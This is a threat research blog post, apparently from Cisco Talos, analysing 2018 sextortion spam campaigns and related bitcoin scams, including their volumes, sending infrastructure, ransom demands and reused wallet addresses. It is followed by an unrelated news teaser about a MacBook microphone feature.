Since this July, attackers are increasingly spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos showing the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion payment by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.



An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis
To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug.30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}[email protected]\.jp/
From =~ /[email protected]\d{3}\.edu/

Campaign Totals
In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.


Number of sextortion emails received by SpamCop over time

The sending IPs are distributed among many countries, however roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.


Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands
Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets
In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.


Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.


Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.

Attackers' use of personal information
One of the first related sextortion campaigns we discovered utilized the victim's telephone number instead of their data breach password. While a telephone number isn't nearly as private or confidential as a user's password, it is still arguably somewhat personal. By including the victim's telephone number, the attackers were hoping they could convince recipients that their sextortion scam was indeed real.


An example sextortion attack using victims' phone numbers

If you read the text closely, you will notice that much of the text in this email is virtually identical to the text contained in the "Aaron Smith" campaigns Talos analyzed previously, especially the text in the closing paragraph.

As a matter of fact, while searching SpamCop, we encountered a sample email message where the attackers appeared to have mistakenly disclosed their template containing the choose-your-own-adventure-style text variations for generating varied message bodies as part of their sextortion spam attack.


An example of a sextortion template message mistakenly emailed out by the attackers

Internationalized sextortion
Security researchers at IBM X-Force recently discovered a sextortion campaign that was purportedly sent through the Necurs' botnet infrastructure in late September 2018. Using the 20 bitcoin wallet indicators of compromise (IoCs) provided by IBM, Talos identified nearly 1,000 different sending IP addresses involved in transmitting both the "Aaron Smith" spam, as well the international sextortion spam that IBM X-Force associated with the Necurs botnet. The overlap in sending IP infrastructure indicates, with a reasonable degree of confidence, that the same spammers are behind both of these sextortion campaigns.

Besides the "7 different languages (ENG, GER, FRE, ITA, JPN, KOR, ARA)" of sextortion spam identified in the X-Force blog, Talos identified additional variations of a similar sextortion campaign in Czech, Spanish, Norwegian, Swedish and Finnish.


An example of a sextortion message in Spanish

Additional attack variations
There were other, similar forms of sextortion spam originating from some of the same Necurs-sending IP infrastructure. Below is an example of a sextortion spam email that is attempting to look like a support ticket. For extra authenticity, the message even includes text near the top of the body that reads: "Camera Ready, Notification: <date>."


An example of a sextortion email disguised as a "Ticket"

The attackers used that same exact bitcoin wallet in a completely different type of bitcoin-related email scam. The BTC wallet 1HJbQG3NsDGqqnnF1cU2c1Cgj1BT65TYRy located in the "Ticket" example above, also appears in an explicit video-for-bitcoin scam. In the sex video swindle, the attackers impersonate a young girl from the Russian Federation, and promise to send a custom explicit video in exchange for a deposit of $100 into the attackers' bitcoin wallet.


An example of an explicit video-for-bitcoin message containing a duplicate sextortion bitcoin wallet

Talos identified additional bitcoin wallets that overlapped, which revealed additional attacks, also likely perpetrated by the same group of spammers. For example, the bitcoin wallet 1NAXPRTdVdR5t7wfR1C4ggr9rwFCxqBZD7 not only appears in the "Ticket"-type sextortion scam messages detailed above, but it also appears in a different scheme meant to extort bitcoin from recipients who may be cheating on their significant other. The spammers claim to have been following the victim, where they obtained photographic evidence concerning the recipient's purported infidelity.


An example of an illicit relationship extortion message

Other (unrelated?) attack variations
As we reviewed additional bitcoin-related spam from SpamCop, we came across several other types of social engineering attacks aimed at obtaining bitcoin payments.

In a clever twist on the "I-know-you-are-cheating" extortion example detailed above, attackers claim to have proof that the victim's partner is in fact cheating on them. While the wording of the text in the message feels somewhat familiar, it is dissimilar enough to other extortion attacks (by containing an attached QR code, for example) that it may in fact be the handiwork of a completely different group of attackers.


A variation of the extortion attack offering victims proof of their partner's infidelity

Talos also discovered messages related to a much more frightening and violent variety of extortion. In these messages, the attackers claim to have been paid to kill the recipient of the email. The hitmen claim to already have their transportation arranged, but since they have had a change of heart, they are now willing to sell information about who hired them to their potential victim. Again, the formula and wording the message sound quite similar to text we witnessed in multiple sextortion emails. Though we suspect it, Talos cannot say for certain that these violent extortion emails are in fact the work of the same attackers.


An example of a violent extortion message threatening to kill the recipient

Other examples of social engineering
There were some bitcoin-related spam campaigns we noticed that, while they had very little connecting them to the spam sent via the Necurs botnet, they represented creative attempts to coerce some victims through social engineering.

First, there was an attack targeting victims with a propensity to fall for get-rich-quick schemes. In this offer, recipients are encouraged to send bitcoin to a wallet address where their bitcoin will magically double in value within three hours' time. This bitcoin "doubler" claims to exploit an undisclosed "bug in the system." While the average user may be able to realize quickly this is a scam, some users who are not as educated on the concept of bitcoin may be susceptible to this type of spam.


An example of the bitcoin doubler email

Other bitcoin-related spam targets those who might be inclined to donate to charity. While easing the suffering of children affected by military aggression is a most admirable cause, we couldn't find anything in this message to indicate that this is a legitimate charitable organization.

An example of the questionable "Charitable Children's Fund" email

We also discovered a piece of spam that claims to be "positive junk mail." The body of the message reads, "You know those emails that keep circulating trying to extort you for bitcoin claiming they have compromised the camera in your computer and have embarrassing videos and photos that they plan to share with your friends and family?...This IS NOT one of those!"


An example of the bitcoin lottery spam

In the Q&A section near the bottom of this email the spammers write, "Q: How do we know this is legitimate? A: You don't. We can't actually post proof without exposing ourselves as well as the winner. Take it for what it's worth. We apologize but this is the best we can do."

If you're curious about how the whole Oct. 4 bitcoin lottery drawing turned out, note that there is only one transaction for the bitcoin wallet mentioned in the spam. That transaction happened back on Sept. 28 and was for $4.

Conclusion
Most anti-spam solutions will filter out obvious sextortion attempts like the ones we highlighted in this post. However, that is no silver bullet. When these kinds of spam campaigns make it into users' email inboxes, many of them may not be educated enough to identify that it's a scam designed to make them give away their bitcoins. Unfortunately, it is clear from the large amount of bitcoin these actors secured that there is still a long way to go in terms of educating potential victims.

Indicators of compromise (IOC)
Here is a list of the 58,611 bitcoin wallets used by the attackers in the "Aaron Smith" sextortion spam.

Apple's New MacBook Disconnects Microphone "Physically" When Lid is Closed

THN - Wed, 31/10/2018 - 11:26
Apple introduces a new privacy feature for all new MacBooks that "at some extent" will prevent hackers and malicious applications from eavesdropping on your conversations. Apple's custom T2 security chip in the latest MacBooks includes a new hardware feature that physically disconnects the MacBook's built-in microphone whenever the user closes the lid, the company revealed yesterday at its

Pages

Subscribe to Shiga Tecnologia aggregator